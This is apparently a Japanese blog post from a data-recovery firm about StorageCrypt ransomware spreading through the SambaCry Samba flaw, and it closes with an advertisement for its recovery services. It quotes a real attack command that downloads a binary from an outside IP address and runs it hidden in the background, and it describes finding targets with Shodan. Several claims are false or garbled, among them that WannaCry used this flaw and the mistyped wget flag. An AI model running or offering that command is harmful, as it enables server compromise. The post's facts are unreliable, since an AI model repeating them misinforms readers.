「.locked」拡張子に暗号化されるStorageCryptランサムウェアの感染拡大

身代金要求ファイル「_READ_ME_for_DECRYPT.txt」

脆弱性SambaCryを利用してLinuxサーバーに感染するStorageCryptランサムウェアです。
SambaCryを利用したツールは、2017年3月26日にShadow Brokersによって公開されたハッキングツール「ELF_SHELLBIND.A」に含まれています。

脆弱性SambaCryとは、2010年3月から確認されていた脆弱性「CVE-2017-7494」です。
この脆弱性は、Linux上の共有フォルダが書き込み可になっている場合に、アップロードした共有ライブララリの実行が行え、shellを起動させる事によりコマンド実行ができます。
Samba3.5.0以降の全てにおいて、この脆弱性があります。
但し、2017年5月にSamba開発チームから更新プログラムが提供されました。しかし、ハッキングは続いています。
WannaCryがこの脆弱性を利用したことから「SambaCry」と呼ばれるようになりました。

ハッキングの手法としては、例えば、「Shodan」検索を用いた場合、「samba」と「port:445」の検索条件でSambaのIPを特定できます。
その後
wget -0 /tmp/apaceha http://45.76.102.45/sambacry && chmod +x /tmp/apaceha &&nohup /tmp/apaceha >/dev/null 2>&1 &
を実行してきます。

StorageCryptランサムウェアはデータファイルを「.locked」拡張子に変えて暗号化してしまいます。
身代金要求ファイル「_READ_ME_for_DECRYPT.txt」を置いていきます。

新しく見つかったStorageCryptランサムウェアは、共有フォルダにAutorun.infファイルとWinGame.exeを置いていきます。
これを実行することにより、CloudサービスをしているLinuxサーバー上で感染および暗号化をしていきます。

当社では、暗号化されたファイルを元に戻す復号サービスとランサムウェアの破壊活動に対応したデータ復旧サービスを行っています。
市販されているデータ復旧ソフトではできない暗号化される前のファイルの取得ができます。
ランサムウェア対応データ復旧サービスは安価に設定していますので小規模事業所、個人様にもご利用していただけるようにしています。

どのようなケースであってもデータを戻す復号サービスをしています。お困りの方はご連絡下さい。

リカバリーしない修理で
データや設定を残したまま修理可能です

無料電話相談実施中。お気軽にご相談ください。042-735-1600

当社独自のハードディスク修復技術と手作業によるウイルス・ランサムウェア駆除でハードディスクを今まで通り使えるように修理します。

リカバリー(初期化)をしてしまうとインストールしたプログラムやデータファイル、ライセンス情報、インターネット設定、メールメッセージ・アカウント、プリンタ設定、電子証明書などが消えてしまいます。リカバリーをしない現状復旧修理なら再インストールや再設定の手間がかからず、修理後すぐに今まで通りパソコンをお使いいただけます。

▼ 詳細はマイクロデータベースホームページへ